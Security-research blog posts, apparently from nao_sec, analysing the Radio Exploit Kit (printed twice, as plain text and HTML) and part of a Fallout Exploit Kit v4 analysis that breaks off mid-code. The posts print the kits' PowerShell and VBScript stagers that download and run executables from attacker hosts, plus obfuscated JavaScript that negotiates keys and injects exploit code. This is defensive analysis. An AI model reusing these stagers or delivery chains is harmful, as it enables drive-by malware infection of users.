First Since July 11 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”. Malvertising -> Unknown EK🚀 -> #AZORult(CC: @malware_traffic, @jeromesegura, @BleepinComputer)https://t.co/CkSfs38D8q pic.twitter.com/Uk37R7g1xh— nao_sec (@nao_sec) 2019年7月11日 The Radio Exploit Kit is not advanced. It exploits a very used vulnerability CVE-2016-0189. The exploit kit code is also unrefined. It is simply sending in malware (we are observing AZORult) using PoC of CVE-2016-0189. We don’t expect this to be a real threat. Most ordinary people will not be affected by this. However, I write this article because it is often observed in Japan. Be aware that these threats exist. Traffic This exploit kit is in the process of growing. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. Here we introduce v1.0, 1.1 and 1.2.0. Version First seen 2nd URL 1.0 2019-07-11_10-00 https[:]//radiobox-online.org/images/image.vbs2 1.1 2019-07-12-20-00 http[:]//95.215.207.24/error.jp 1.2.0 2019-07-13_14-00 http[:]//95.215.207.24/im/1.jpg 1.2.1 2019-07-13_15-00 http[:]//95.215.207.24/im/build1.jpg 1.2.2 2019-07-14_13-00 http[:]//95.215.207.24/im/build11.jpg 1.2.3 2019-07-14_20-00 http[:]//95.215.207.24/im/vkino2.mid v1.0 First, let’s look at v1.0. It is the traffic when we first encountered Radio EK. When redirected from the ad-network to https [:] // radiobox-online.org, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this. Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'" This will generate a second traffic. image.vbs2 is a very simple code. mm = "h" nn = "t" bb = "/" vv = ":" cc = "p" x = "." zz = "vbs" q = "0" w = "1" e = "2" r = "3" t = "4" y = "5" u = "6" a = "7" s = "8" f = "9" strr = mm&nn&nn&cc&vv&bb&bb rrts = t&y&x&w&e&x&e&w&y&x&w&y&a&bb rprt = strr&rrts d.Add "1", ""&rprt&"src/load2.jpg|"&temp&"\temp.vbs" Set x = CreateObject("MSXML2.XMLHTTP") For Each i In d x.open "GET", Split(d.Item(i), "|")(0), false x.send() This will load load2.jpg. load2.jpg is also a simple code. Set css = CreateObject("WScript.Shell") css = "http[:]//45.12.215.157/images/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next This process is repeated from 1.jpg to 5.jpg in order. The 1.jpg downloaded and executed in this way is malware. Malware is unencrypted and is plain binary. v1.1 Next, let’s look at v1.1. For v1.1, the code executed by CVE-2016-0189 is as follows: Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2" Unlike v1.0, the VBScript URL to be loaded next is http[:]//95.215.207.24/error.jp. At this time, the end of the URL is .jp. I don’t know if this is a mistake in hitting jpg or meaning Japan. error.jp will execute code similar to v1.0 load2.jpg. Set css = CreateObject("WScript.Shell") css = "http[:]//95.215.207.24/im/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next This is also repeated until /im/5.jpg. The downloaded / executed /im/1.jpg is malware. As in v1.0, malware is not encrypted. v1.2.0 Finally, let’s look at v1.2. It became very simple. It can be said that nothing is over. The code executed by CVE-2016-0189 is as follows: Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2" Thus, /im/1.jpg downloaded and executed is malware. As before, malware is not encrypted. The path of /im/1.jpg has only changed since v1.2.0. The essential process is the same. Conclusion Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.

<h2 id="first">First</h2> Since July 11 2019, we have observed a new Drive-by Download attack. It is redirected from the ad-network. It does not use a conventional Exploit Kit such as RIG or Fallout, but uses its own exploit kit. We call this “Radio Exploit Kit”. <blockquote class="twitter-tweet" data-lang="ja">Malvertising -> Unknown EK🚀 -> <a href="https://twitter.com/hashtag/AZORult?src=hash&ref_src=twsrc%5Etfw">#AZORult</a> (CC: <a href="https://twitter.com/malware_traffic?ref_src=twsrc%5Etfw">@malware_traffic</a>, <a href="https://twitter.com/jeromesegura?ref_src=twsrc%5Etfw">@jeromesegura</a>, <a href="https://twitter.com/BleepinComputer?ref_src=twsrc%5Etfw">@BleepinComputer</a>)<a href="https://t.co/CkSfs38D8q">https://t.co/CkSfs38D8q</a> <a href="https://t.co/Uk37R7g1xh">pic.twitter.com/Uk37R7g1xh</a>— nao_sec (@nao_sec) <a href="https://twitter.com/nao_sec/status/1149273164058222592?ref_src=twsrc%5Etfw">2019年7月11日</a></blockquote> <script async="" src="https://platform.twitter.com/widgets.js" charset="utf-8"></script> The Radio Exploit Kit is not advanced. It exploits a very used vulnerability CVE-2016-0189. The exploit kit code is also unrefined. It is simply sending in malware (we are observing AZORult) using PoC of CVE-2016-0189. We don’t expect this to be a real threat. Most ordinary people will not be affected by this. However, I write this article because it is often observed in Japan. Be aware that these threats exist. <h2 id="traffic">Traffic</h2> This exploit kit is in the process of growing. Five updates have been made since we started observation (including simple path updates). We identify each one as follows. Here we introduce v1.0, 1.1 and 1.2.0. <div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Version First seen 2nd URL 1.0 2019-07-11_10-00 https[:]//radiobox-online.org/images/image.vbs2 1.1 2019-07-12-20-00 http[:]//95.215.207.24/error.jp 1.2.0 2019-07-13_14-00 http[:]//95.215.207.24/im/1.jpg 1.2.1 2019-07-13_15-00 http[:]//95.215.207.24/im/build1.jpg 1.2.2 2019-07-14_13-00 http[:]//95.215.207.24/im/build11.jpg 1.2.3 2019-07-14_20-00 http[:]//95.215.207.24/im/vkino2.mid </code></pre></div></div> <h3 id="v10">v1.0</h3> First, let’s look at v1.0. It is the traffic when we first encountered Radio EK. <img src="https://nao-sec.org/assets/2019-07-16/1.0.png" alt="" /> When redirected from the ad-network to <code class="language-plaintext highlighter-rouge">https [:] // radiobox-online.org</code>, code that exploits CVE-2016-0189 will be executed. This is not obfuscated and is the same as PoC. The important code is this. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell","(New-Object System.Net.WebClient).DownloadFile('https[:]//radiobox-online.org/images/image.vbs2','documentation.vbs');Start-Process 'documentation.vbs'" </code></pre></div></div> This will generate a second traffic. <code class="language-plaintext highlighter-rouge">image.vbs2</code> is a very simple code. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>mm = "h" nn = "t" bb = "/" vv = ":" cc = "p" x = "." zz = "vbs" q = "0" w = "1" e = "2" r = "3" t = "4" y = "5" u = "6" a = "7" s = "8" f = "9" strr = mm&nn&nn&cc&vv&bb&bb rrts = t&y&x&w&e&x&e&w&y&x&w&y&a&bb rprt = strr&rrts d.Add "1", ""&rprt&"src/load2.jpg|"&temp&"\temp.vbs" Set x = CreateObject("MSXML2.XMLHTTP") For Each i In d x.open "GET", Split(d.Item(i), "|")(0), false x.send() </code></pre></div></div> This will load <code class="language-plaintext highlighter-rouge">load2.jpg</code>. <code class="language-plaintext highlighter-rouge">load2.jpg</code> is also a simple code. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set css = CreateObject("WScript.Shell") css = "http[:]//45.12.215.157/images/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next </code></pre></div></div> This process is repeated from <code class="language-plaintext highlighter-rouge">1.jpg</code> to<code class="language-plaintext highlighter-rouge"> 5.jpg</code> in order. The <code class="language-plaintext highlighter-rouge">1.jpg</code> downloaded and executed in this way is malware. Malware is unencrypted and is plain binary. <h3 id="v11">v1.1</h3> Next, let’s look at v1.1. <img src="https://nao-sec.org/assets/2019-07-16/1.1.png" alt="" /> For v1.1, the code executed by CVE-2016-0189 is as follows: <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1ehqM6');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/error.jp', $local_path+'documentation.vbs');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.vbs';Start-Process $local_path2" </code></pre></div></div> Unlike v1.0, the VBScript URL to be loaded next is <code class="language-plaintext highlighter-rouge">http[:]//95.215.207.24/error.jp</code>. At this time, the end of the URL is <code class="language-plaintext highlighter-rouge">.jp</code>. I don’t know if this is a mistake in hitting <code class="language-plaintext highlighter-rouge">jpg</code> or meaning <code class="language-plaintext highlighter-rouge">Japan</code>. <code class="language-plaintext highlighter-rouge">error.jp</code> will execute code similar to v1.0 <code class="language-plaintext highlighter-rouge">load2.jpg</code>. <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set css = CreateObject("WScript.Shell") css = "http[:]//95.215.207.24/im/" ico = ".exe" css1 = "temp" & rand(1, 100) css2 = "temp" & rand(101, 200) css3 = "temp" & rand(201, 300) css4 = "temp" & rand(301, 400) css5 = "temp" & rand(401, 500) Set oShell = CreateObject( "WScript.Shell" ) temp=oShell.ExpandEnvironmentStrings("%TEMP%\") Dim good Set good = CreateObject("WScript.Shell") good = 200 ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''1 set d = CreateObject("Scripting.Dictionary") d.Add "1", "" & css & "1.jpg|"&temp&"" & css1 & "" & ico & "" Set ar1 = CreateObject("MSXML2.XMLHTTP") For Each i In d ar1.open "GET", Split(d.Item(i), "|")(0), false ar1.send() If ar1.Status = good Then With CreateObject("ADODB.Stream") .Open .Type = 1 .Write ar1.ResponseBody .Position = 0 .SaveToFile Split(d.Item(i), "|")(1), 2 .Close End With set WshShell = WScript.CreateObject("Wscript.Shell") WshShell.Run temp & ""& css1 &"" & ico & "", ,true End If Next </code></pre></div></div> This is also repeated until <code class="language-plaintext highlighter-rouge">/im/5.jpg</code>. The downloaded / executed <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> is malware. As in v1.0, malware is not encrypted. <h3 id="v120">v1.2.0</h3> Finally, let’s look at v1.2. <img src="https://nao-sec.org/assets/2019-07-16/1.2.png" alt="" /> It became very simple. It can be said that nothing is over. The code executed by CVE-2016-0189 is as follows: <div class="language-vb highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Set Object = CreateObject("Shell.Application") Object.ShellExecute "PowerShell", "(New-Object System.Net.WebClient).DownloadString('https[:]//2no.co/1YdQt7');$local_path = [System.IO.Path]::GetTempPath();(New-Object System.Net.WebClient).DownloadFile('http[:]//95.215.207.24/im/1.jpg', $local_path+'documentation.exe');$local_path2 = [System.IO.Path]::GetTempPath()+'documentation.exe';Start-Process $local_path2" </code></pre></div></div> Thus, <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> downloaded and executed is malware. As before, malware is not encrypted. The path of <code class="language-plaintext highlighter-rouge">/im/1.jpg</code> has only changed since v1.2.0. The essential process is the same. <h2 id="conclusion">Conclusion</h2> Radio EK is active, but its attack power is very low. Compared to RIG and Fallout, the threat is not something that bothers you. However, there may be aggressive updates in the future. You should be aware of the existence of this EK.
Steady Evolution of Fallout v4

Tue, 09 Jul 2019 15:00:00 -0000

First We have been observing the Fallout Exploit Kit since August 2018. Fallout is using non-characteristic URL and heavily obfuscated landing page. The user still exists and attacks are observed daily. Recently, we were investigating an attack campaign that infects Raccoon Stealer in the flow of PopAds-> KeitaroTDS-> Fallout. About Fallout, we have already written three reports. The first one was about the emergence of Fallout, the second one was to start using PowerShell and the third one was to start exploiting PoC on GitHub. We divide these major changes by version and call them v1~3. Hello “Fallout Exploit Kit” In-Depth analysis of new Fallout Exploit Kit Analysis of Fallout Exploit Kit v3 We wrote about v3 in March 2019. v3 is not stable and has been updated to the next version immediately. @EKFiddle (created and maintained by @jeromesegura) reported this change on April 11. #EKFiddle [Regex update]: #FalloutEKSeems like there is no more use of the PoC on GitHub for CVE-2018-8174.Pushing #GandCrab in this particular instance.https://t.co/U67qZosp1e pic.twitter.com/buVTakYuhJ— EKFiddle (@EKFiddle) 2019年4月11日 We call this a big update v4 (it is still v4). Detailed analysis report has not been written about what kind of update Fallout has done. However, this update is very big. At least for us (Exploit Kit analyst), that made the analysis very cumbersome. Fallout v4 incorporates the following features. 1. Diffie-Hellman key exchange 2. VM detection 3. Process detection Here, we will share detailed analysis results on the updates made by Fallout v4. But unfortunately, we did not understand everything. If you are aware of it, please help us. Traffic chain First, let’s look at the previous traffic chain. v1~3 was like this. In v3, it acquired PoC of CVE-2018-8174 from GitHub, and attacked by rewriting the part of shellcode. So what kind of traffic chain is v4? 1. Landing Page 2. JavaScript Code 3. Encoded Code 1 4. Encoded Code 2 (CVE-2018-8174 + SWF Loader) 5. CVE-2018-15982 6. PowerShell Code 7. Malware In this way, an attack is performed by seven traffics. Let’s look at each one in order. (In the following, we will use different traffic data from the above. The detailed reason will be mentioned later, but it is difficult to capture and analyze traffic at the same time) Landing Page + JS Code + Encoded Data In the landing page, JavaScript code is read first. <!DOCTYPE html> <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> <script type="text/javascript" src="/04_09_2003/Symposium?Peristele=02_03_1943&LE3r=Aps&ILZhH=Frazzling-Anorexias"></script> </head> This includes CryptoJS and BigInteger obfuscated. Excluding the large library parts, there is very little processing. // key window.III1l1 = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("8b69cbdfc5fe43e69b7920c8ee721fc9"); // iv window.II1ll11I = window["Il1IIllIlI1I"]["IIIlI"]["II1I1lI1I"]["ll1llI1"]("301ae8205ddcd5897df69e3b0c056c34"); // aes_decrypt(enc_data, key, iv) window.l11llIll = window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]("p4N9IqH/oiAKHkDCR0zXXfrvhwVrVPsFZSNUjkVFXxxBofjpd5JLM1sdAega3oRy", III1l1, { lI1lIl1Ill: II1ll11I })["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); First, two data (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) will appear. This is a key and an IV for AES encryption. By decrypting the next Base64 character string using these keys and IV, the necessary data (specifically, the URL for acquiring encoded data used in the next step) can be obtained. . When it tries decoding, it becomes like this. Next is the process of checking which browser is being used. Depending on it, Opera, Firefox, IE or Chrome is investigated. // check browser window["String"]["prototype"]["II1l1IlI"] = function () { return (!!window["opr"] && !!window["opr"]["addons"] || !!window["opera"] || navigator["userAgent"]["indexOf"](" OPR/") >= 0) + this + (typeof window["InstallTrigger"] !== "undefined") + this + (false || !!window["document"]["documentMode"]) + this + (!!window["chrome"] && !!window["chrome"]["runtime"]) }; Then there is a process to check the version of Adobe Flash Player. This data will be used later. (function () { window.l1l111I = ''; try { window.l1l111I = new ActiveXObject('ShockwaveFlash.ShockwaveFlash').getVariable('$version') } catch (e) {} })(); The process then returns to the landing page. In the landing page, one function is defined and executed. Let’s look at that function. // str_A var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_C var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_D var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](), 16); // str_E => str_B.modPow(str_C, str_D) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll, lll1II); Here, many processes such as window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l']() appear. This is defined in CryptoJS and generates a 32 character random hexadecimal string. After generating four random data, use the second, third and fourth of them to generate the fifth data. Here modPow is used. The five data prepared here will be used in the ensuing cryptographic process. We call them str_A, str_B, str_C, str_D, str_E. The following code is divided into three parts. Onreadystatechange after the first one has sent a request to the server. The process of generating data to be sent by the second. The third is the process to send. These are the standard XMLHttpRequest POST procedures. First, let’s look at the process of generating transmission data. var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A // browser check data l11IlIIlllll['II1l1IlI'] = '@@' ['II1l1IlI'](); Five data have been added to the array l11IlIIlllll. Other than the last one is the random data created earlier. There are 5 random data, but the data other than str_C is send data. The last one is the browser check data generated earlier. It checks whether the browser is Opera, Firefox, IE or Chrome, respectively, and contains true or false and is concatenated with @@. Such data is prepared for send. It should be noted here that str_C has not been sent to the server. Next, let’s look at the sending process. window['I1l1I1'](Il1I11l, "post", l11llIll, true); /* -- snip -- */ // Send POST window['l1lllIIlI']( Il1I11l, // aes_encrypt(data, key, iv) window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // post request data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l']() ); This is also a general request sending process. The URL is a string decoded by AES earlier. The data to be sent is the previously prepared data, but these are encrypted by AES. The key and IV are the same as those used to decode the URL. The previous data to be encrypted looks like this. { "lIlII11":"c81e728d9d4c2f636f067f89cc14862c", "lll1II":"a87ff679a2f3e71d9181a67b7542122c", "l11IlIl":"3f05415ebff145466040f6a73dca8704", "lI1lIl1Ill":"c4ca4238a0b923820dcc509a6f75849b", "II1l1IlI":"false@@false@@true@@false" } The data actually sent is encrypted in this way. TvU4TAyld3MNlDcMtLwxBo+uVXAbIB1jpPO1a9HDv2dZs7HonG67s8heWoMyvnUFqFBdoEhU0STYjHHQxX6DK7x7Z1naG/2TAdm+AR5l6gpYVl4jXB9oOOyfJtZrfJHabQT5Jhlqv1dtvsJ+0G27qhamqtPT16wCpXn2R2WHf8NJu9SvXSSVadW7sT6QDt32Jt0z3oR0VIlpuE/w3snfKDNIjJYhuMz/VGYIL9WNdg0hC26sxB5fJ5fOOuifh2rNk9GgNsNdfVP01Tf77GRDu9puTbgfsgYOnCz0ONOmp05B14kJ1tK8ZI6ciOWLvOYV Let’s look at the process after sending. onreadystatechange is called. Here, two AES decodings are performed. Let’s first look at the first decoding process. // aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key { lI1lIl1Ill: window['II1ll11I'] } // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); var l1I1l1 = window['lIl11'](lIlIl1IIl11); POST response data is encrypted with AES. The keys and IV are the same as before, and the hard-coded values (8b69cbdfc5fe43e69b7920c8ee721fc9 and 301ae8205ddcd5897df69e3b0c056c34) are hard-coded in the JavaScript code. Jsonify is performed because the JSON data can be obtained by decoding. The decoded JSON data looks like this. { "IlI1l":"9b412e5c651d73fd1e271dd63f6901a0", "I1111":"r+sZGwxURs48PDt8pilYLNYjKbVrMHSmlgv0jeEE7qd8KN+KbbqRpYBUUrEFfM5VSLfRPthHQmyzFoY7fuCtOQQ9vUiMBC+3\/pL…" } Decode the second data using the first (32-character hexadecimal string) of this data. The first data is called str_F. Also, decoding is done with AES, but the key and IV are different from before. var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'], 16); // str_F // key (str_G) => str_F.modPow(str_C, str_D) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll, lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while (IIIIlI1IllII > 0) { I1Il1I1 = '0' + I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // aes_decrypt(enc_data, key, iv) var Il11lII1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIlIl1IIl11'], // enc_data II1ll, // str_G { lI1lIl1Ill: lI1lIl1Ill } // iv => str_A ); The values generated by str_F, str_C and str_D are called str_G. Thus, str_C is required to decode the data, but str_C has not been sent to the server. By looking at the traffic data, you can see str_E and str_G created by str_C, but it is impossible to find str_C. Please see Wikipedia for details. Diffie–Hellman key exchange - Wikipedia The data thus decoded is executed as JavsScript. // eval II1Il['ll1I1'](); Let’s look at the executed code. First, the URL used next is decoded. The key and IV used at this time are hard-coded initial values. // aes_decrypt(enc_url, key, iv) var l11l1I1 =window["Il1IIllIlI1I"]["lI11lIl"]["l11II11l"]( "l9kie2x7t4Iq4hRNA3G3Juz+buSrv9OSyATsAvZRjsoWkjatAa3Am6oRnar5jjv2N8XFpvDYQbKswFbyKiGPXM/eRwj5+hz4hg+dTKr5BLk=", III1l1, { lI1lIl1Ill:II1ll11I } )["lIlIlll11l"](window["Il1IIllIlI1I"]["IIIlI"]["Il11I1II"]); Then, as before, the function is called. Let’s look at the function. First, define the necessary data for encryption/decryption as before. Give each one a name as before. // str_A2 var l1ll1 = window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](); // str_B2 var lIlII11 = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_C2 var ll1l1IlIIIll = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_D2 var lll1II = window['l1l1IIlIlI'](window['Il1IIllIlI1I']['lIIIlI1IlII']['I111l11l']['II1I1I'](16)['lIlIlll11l'](),16); // str_E2 => str_B2.powMod(str_C2, str_D2) var l11IlIl = lIlII11['ll11IIl'](ll1l1IlIIIll,lll1II); Next, prepare the data to send as a POST request. Unlike before, Adobe Flash Player version information is also sent. var l11IlIIlllll = {}; l11IlIIlllll['lIlII11'] = lIlII11['lIlIlll11l'](16); // str_B2 l11IlIIlllll['lll1II'] = lll1II['lIlIlll11l'](16); // str_D2 l11IlIIlllll['l11IlIl'] = l11IlIl['lIlIlll11l'](16); // str_E2 l11IlIIlllll['lI1lIl1Ill'] = l1ll1; // str_A2 l11IlIIlllll['II1l1IlI'] = '@@'['II1l1IlI'](); // browser check data l11IlIIlllll['l1l111I'] = window['l1l111I']; // Adobe Flash Player version check data The sending process is the same as the previous one. The key and IV used in this case are also initial values. window['I1l1I1'](Il1I11l,"post",l11l1I1,true); window['l1lllIIlI']( Il1I11l, // aes_encrypt window['Il1IIllIlI1I']['lI11lIl']['Ill1lI1Ill']( window['IIII1Il'](l11IlIIlllll), // POST Data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l']() ); Thus, onreadystatechange is called as well. Here too, the decoding process is performed as before. First, decode POST response data with the same key and IV as before. // aes_decrypt(enc_data, key, iv) var lIlIl1IIl11 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( Il1I11l['responseText'], // enc_data window['III1l1'], // key {lI1lIl1Ill:window['II1ll11I']} // iv )['lIlIlll11l'](window['Il1IIllIlI1I']['IIIlI']['Il11I1II']); When jsonify the decoded result, three data are included like this. The first 32-character hexadecimal string is called str_F2. { "lIlll1IIlI": "87e087b48d4b06215f486021f23f5470", "lIIIIllIl1": "oUeRtTwLk9lLYqMwZC3AM49H8HDw15IqymZ0W\/vw87Vd9RtdXhps9ZppZc\/INO01Bqk79BOMS9ykHCDPE\/\/kWCHQuuh0\/rr…", "II11lIl11": "88HY4nkc9TWmnRPi\/hEPmk8ZCTJ5tIwItosOTmqFjUBFxCXfoXdMKas+TeKLUbdwsXAhvGa35wNmMnajdPzt1huWerzwnhoGcFP…" } Decrypt these data. Thus two data are decoded. var lIlll1IIlI = window['l1l1IIlIlI'](l1I1l1['lIlll1IIlI'],16); // str_G2 => str_F2.modPow(str_C2, str_D2) var llIIlI = lIlll1IIlI['ll11IIl'](ll1l1IlIIIll,lll1II); var I1Il1I1 = llIIlI['lIlIlll11l'](16); var IIIIlI1IllII = 32 - I1Il1I1.length; while(IIIIlI1IllII > 0) { I1Il1I1 = '0'+I1Il1I1; IIIIlI1IllII--; } var II1ll = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](I1Il1I1); // str_G2 var lI1lIl1Ill = window['Il1IIllIlI1I']['IIIlI']['II1I1lI1I']['ll1llI1'](l1ll1); // str_A2 // aes_decrypt() var I1II111I1 = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['lIIIIllIl1'], // enc_data_1 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); var IIIIl = window['Il1IIllIlI1I']['lI11lIl']['l11II11l']( l1I1l1['II11lIl11'], // enc_data_2 II1ll, // str_G2 {lI1lIl1Ill: lI1lIl1Ill} // str_A2 ); The data thus decoded is written to Body and executed. The decoded data is the CVE-2018-8174 exploit code and the CVE-2018-15982 exploit code for reading swf loader. if(IlIII1lll['length'] !== 0) { var IIlIl = window['document']['createElement']("iframe"); IIlIl['setAttribute']("id", "IlIlll1I1"); window['document']['getElementsByTagName']("BODY")[0].appendChild(IIlIl); var I11I11IIlIII = window['document']['getElementById']("IlIlll1I1")['contentWindow']['document']; I11I11IIlIII['open'](); I11I11IIlIII['write'](IlIII1lll); I11I11IIlIII['close'](); } if(lIl1l1I['length'] !== 0) { var l1III11 = window['document']['createElement']("iframe"); l1III11['setAttribute']("id", "lII1I1IlI1I"); window['document']['getElementsByTagName']("BODY")[0].appendChild(l1III11); var llIll1lI = window['document']['getElementById']("lII1I1IlI1I")['contentWindow']['document']; llIll1lI['open'](); llIll1lI['write'](lIl1l1I); llIll1lI['close'](); } For swf loader, the following code is executed. <html> <head> <meta http-equiv="x-ua-compatible" content="IE=10"> </head> <body> <div id="BnjJbx"><object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="205" height="528" id="BnjJbx" align="middle"> <param name="movie" 